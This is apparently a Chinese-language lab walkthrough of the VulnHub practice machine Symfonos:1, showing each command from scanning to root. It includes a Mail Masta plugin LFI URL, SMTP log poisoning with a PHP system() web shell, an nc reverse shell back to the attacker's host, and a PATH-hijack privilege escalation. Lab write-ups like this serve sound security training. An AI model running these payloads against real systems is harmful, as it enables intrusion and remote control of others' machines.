OSCP难度靶机之Symfonos:1

admin

140488
文章

117
评论

2022年3月27日21:11:29评论294 views字数 1791阅读5分58秒阅读模式

虚拟机信息：

虚拟机下载地址：https://www.vulnhub.com/entry/symfonos-1,322/

虚拟机简介：该机器是为准备OSCP而开发的,两个flag：user.txt和proof.txt

目标：1个flag

级别：初级

1、通过arp-scan检测主机IP地址

arp-scan -l

OSCP难度靶机之Symfonos:1

2、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.1.9

查看开放22、25、80、139、445端口

OSCP难度靶机之Symfonos:1

3、WEB渗透测试

3.1 查看服务器开启smb服务，先进行smb扫描探测

enum4linux 192.168.1.9

OSCP难度靶机之Symfonos:1

使用smbclient进行连接

smbclient -H //192.168.1.9/anonymous

OSCP难度靶机之Symfonos:1

查看文件得到三个密码，epidioko、qwerty、baseball

OSCP难度靶机之Symfonos:1

3.2 查看还有一个用户名的连接，使用qwerty密码连接成功

smbclient -H //192.168.1.9/helios  -U helios
get research.txt
get todo.txt

OSCP难度靶机之Symfonos:1

查看提示有一个/h3l105

OSCP难度靶机之Symfonos:1

3.3 访问该页面后，查看到是一个WordPress站点

OSCP难度靶机之Symfonos:1

3.4 使用wpscan进行扫描，由于页面访问比较慢，需要添加hosts

vim /etc/hosts

OSCP难度靶机之Symfonos:1

使用wpscan进行扫描，查看到有两个漏洞的插件

wpscan --url http://symfonos.local/h3l105/ -eap

OSCP难度靶机之Symfonos:1

3.5 漏洞检索，发现两个插件都有漏洞，但是SQL注入漏洞需要用户名和密码，LFI不需要用户名密码

searchsploit site editor 1.1.1
searchsploit mail masta 1.0

OSCP难度靶机之Symfonos:1

3.6 测试使用LFI读取/etc/passwd

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

OSCP难度靶机之Symfonos:1

3.7 使用SMTP日志投毒配合LFI来进行RCE

参考：https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/

telnet 192.168.1.9 25
MAIL FROM: <test>
RCPT TO: Helios
data
<?php system($_GET['a']);?>
.
quit

OSCP难度靶机之Symfonos:1

3.8 测试访问 helios 邮件

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=ip%20a

OSCP难度靶机之Symfonos:1

3.9 Kali开启NC反弹，并执行shell反弹

nc -nlvp 4444

OSCP难度靶机之Symfonos:1

执行反弹shell连接，并获取到反弹shell

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc -nv 192.168.1.129 4444 -e /bin/bash

OSCP难度靶机之Symfonos:1

4、系统提权

4.1 使用python优化脚本,无sudo权限，查找suid二进制文件

python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
find / -perm -u=s 2>/dev/null

OSCP难度靶机之Symfonos:1

4.2 查看/opt/statuscheck用途,运行程序后执行http请求

type /opt/statuscheck
ls -l /opt
/opt/statuscheck

OSCP难度靶机之Symfonos:1

4.3 使用string查看二进制包含的字符串，执行curl命令

strings /opt/statuscheck

OSCP难度靶机之Symfonos:1

4.4 使用path变量提权

cd /tmp
echo $'#!/bin/shn/bin/sh' > curl
chmod +x curl
export PATH=$(pwd):$PATH
/opt/statuscheck
whoami

OSCP难度靶机之Symfonos:1

4.5 查看flag信息

ls /root
cat /root/proof.txt

OSCP难度靶机之Symfonos:1

原文始发于微信公众号（安全孺子牛）：OSCP难度靶机之Symfonos:1

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

OSCP难度靶机之Symfonos:1

1、通过arp-scan检测主机IP地址

2、通过nmap进行端口扫描

3、WEB渗透测试

3.1 查看服务器开启smb服务，先进行smb扫描探测

3.2 查看还有一个用户名的连接，使用qwerty密码连接成功

3.3 访问该页面后，查看到是一个WordPress站点

3.4 使用wpscan进行扫描，由于页面访问比较慢，需要添加hosts

3.5 漏洞检索，发现两个插件都有漏洞，但是SQL注入漏洞需要用户名和密码，LFI不需要用户名密码

3.6 测试使用LFI读取/etc/passwd

3.7 使用SMTP日志投毒配合LFI来进行RCE

3.8 测试访问 helios 邮件

3.9 Kali开启NC反弹，并执行shell反弹

4、系统提权

4.1 使用python优化脚本,无sudo权限，查找suid二进制文件

4.2 查看/opt/statuscheck用途,运行程序后执行http请求

4.3 使用string查看二进制包含的字符串，执行curl命令

4.4 使用path变量提权

4.5 查看flag信息

【攻防对抗】外网打点代码审计+内网深信服EDR绕过的案例

记某SRC从FUZZ测试到SQL注入的案例

Docker逃逸——挂载逃逸

线程劫持

【新手必入】Hacker最常用的一百个power shell

内容安全策略（CSP）绕过

API 攻击 - 破解 JWT 令牌

多个未授权漏洞深度利用实战

Kimsuky APT组织最新免杀样本分析

从Mimikatz到黄金票据：黑客内网漫游的核心武器库

发表评论

在线咨询

微信